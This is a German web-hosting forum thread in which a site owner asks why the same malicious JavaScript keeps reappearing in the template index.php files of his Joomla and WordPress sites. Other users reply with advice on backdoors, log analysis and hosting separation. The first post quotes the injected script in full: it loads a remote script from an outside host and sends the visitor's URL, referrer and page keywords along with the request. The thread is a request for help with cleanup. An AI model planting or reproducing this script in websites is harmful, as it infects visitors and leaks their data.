+ Antworten
Ergebnis 1 bis 4 von 4

Thema: Webseite gehackt

  1. #1
    War schon öfter hier
    Registriert seit
    28.06.2007
    Beiträge
    130
    Bedankte sich
    12
    Erhielt 2 Danksagung
    in 1 Beitrag

    Standard Webseite gehackt

    Hi Leute.

    In meinem Webspace habe ich einige Webseiten. Das geht bei Joomla 1.5 über 2.5 bis hin zu 3.5. Auch eine Wordpress und eine HTML Seite.

    Nun ist es so das seit einiger Zeit immer der selbe Schadcode im Quelltext zu finden ist. Das komische ist das der Code auf allen Webseiten ist. Immer im Template in der index.php. Nur die HTML ist nicht betroffen.

    Habe natürlich direkt meine Passwörter geändert und alle Joomla Versionen auf den letzten Stand der jeweils aktuellen Version gebracht. Auch alle Plugins habe ich geupdatet.

    Dachte ja es wäre damit vorbei aber nur einen Tag später war wieder dieser Code vorhanden.

    Google gefällt das natürlich gar nicht und gibt Warnungen für meine Seiten aus.

    Mein Hoster ist auch mit seinem Latein am Ende.

    Könnt ihr mir sagen wie so etwas möglich ist?

    Der Code ist immer der selbe und auch an der selben stelle im Header.

    PHP-Code:
    <script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' 'http://www.salpost.it/js/jquery.min.php' '?key=b64' '&utm_campaign=' 'K85164' '&utm_source=' window.location.host '&utm_medium=' '&utm_content=' window.location '&utm_term=' encodeURIComponent(((k=(function(){var keywords '';var metas document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.lengthx<yx++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' keywords null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' encodeURIComponent(document.referrer) + '"><' '/script>')));</script> 
    Über Hilfe würde ich mich freuen.

    Gruß Maddoc

  2. #2
    Hat hier eine Zweitwohnung Avatar von kitepascal
    Registriert seit
    18.03.2009
    Ort
    bei Aachen
    Beiträge
    1.206
    Bedankte sich
    81
    Erhielt 475 Danksagungen
    in 451 Beiträgen

    Standard

    Hi,

    mehrere Seiten im gleichen Hosting Account ohne rechtliche Trennung zu halten ist zwar komfortabel, sicherheitstechnisch aber sehr ungünstig.

    Könnt ihr mir sagen wie so etwas möglich ist?
    Üblicherweise werden bei einem Hack in den Tiefen sämtlicher Verzeichnisse einige Backdoors verstreut, worüber der Angreifer immer wieder Zugriff bekommt. Durch Updates verschwinden diese Dateien natürlich nicht.
    Wie viele Installationen sind denn insgesamt betroffen? Erstmal gilt es herauszufinden, auf welche davon sich der Schadcode konzentriert und wie die index.php Änderungen zustande kommen.

    Wenn du die Access Logs durchsiehst, wirst du auf erste Schaddateien stoßen.
    Weiterführende Infos liefern Google und die Foren ja zur Genüge.
    Die 1.5/2.5er sind hoffentlich mit sämtlichen Patches ausgestattet?

    Auf kurz oder lang solltest du dir einen Hostinganbieter suchen, der Unteraccounts oder Verzeichnis Quotas (df.eu) ermöglicht.

    Gruß

    Pascal
    Geändert von kitepascal (27.09.2016 um 23:42 Uhr)

  3. #3
    Neu an Board
    Registriert seit
    19.10.2016
    Beiträge
    1
    Bedankte sich
    0
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard Logfiles analysieren, Sicherheitslücke identifizieren und Lücke schließen

    Hi,

    wenn jemand in ein CMS einbricht, dann passiert das meist nicht über Passwörter, sondern eher über Sicherheitslücken im Core oder in einem Plugin des CMS. Deshalb wäre es wichtig zu analysieren an welcher Stelle der Angreifer auf das System zugreifen konnte, um den Schadcode einzuschleußen.

    Sinnvoll wäre es die Webseite zu sperren, sodass keinen Dritten geschadet werden.

    Ich habe mal grundsätzlich zusammen geschrieben was zu tun ist, wenn eine Webseite gehackt wurde, vielleicht hilft das ja: https://www.sixhop.net/blog/webseite-gehackt/

    Viele Grüße
    Andi

  4. #4
    Wohnt hier Avatar von SniperSister
    Registriert seit
    23.09.2005
    Ort
    Köln
    Alter
    27
    Beiträge
    2.943
    Bedankte sich
    96
    Erhielt 946 Danksagungen
    in 608 Beiträgen

    Standard

    Hiermit verleihe ich dir mit großer Freude den offiziellen "Hat vor dem sinnlosen Backlink-Post mal wieder nicht gesehen, dass die Links hier auf nofollow gesetzt sind"-Award für den Monat Oktober 2016. Großes Kino!

+ Antworten

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein